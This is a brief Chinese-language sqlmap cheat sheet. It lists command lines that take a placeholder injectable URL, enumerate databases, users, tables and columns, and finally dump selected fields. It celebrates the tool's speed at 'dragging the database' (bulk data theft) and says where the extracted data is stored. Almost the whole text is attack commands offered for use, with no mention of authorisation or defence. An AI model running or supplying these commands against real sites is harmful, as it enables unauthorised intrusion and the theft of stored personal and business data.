SQLMAP是一款开源的渗透测试程序，它可以自动探测和利用SQL注入漏洞来获得我们想要的数据。我们可以利用它执行特定的命令、查看文件、获取各种数据；当然，最猥琐的是它利用注入点拖库的速率还是灰常让人满意的。

#>  ./sqlmap.py -u “注入地址” -v 1 --dbs   // 列举数据库 

#> ./sqlmap.py -u “注入地址” -v 1 --current-db   // 当前数据库

#>./sqlmap.py -u “注入地址” -v 1 --users    // 列数据库用户

#>  ./sqlmap.py -u “注入地址” -v 1 --current-user  // 当前用户

#>  ./sqlmap.py -u “注入地址” -v 1 --tables -D “数据库”   // 列举数据库的表名

#> ./sqlmap.py -u “注入地址” -v 1 --columns -T “表名” -D “数据库”   // 获取表的列名

#>./sqlmap.py -u “注入地址” -v 1 --dump -C “字段,字段” -T “表名” -D “数据库”   // 获取表中的数据，包含列 

已经开始拖库了，SQLMAP是非常人性化的，它会将获取的数据存储sqlmap/output/中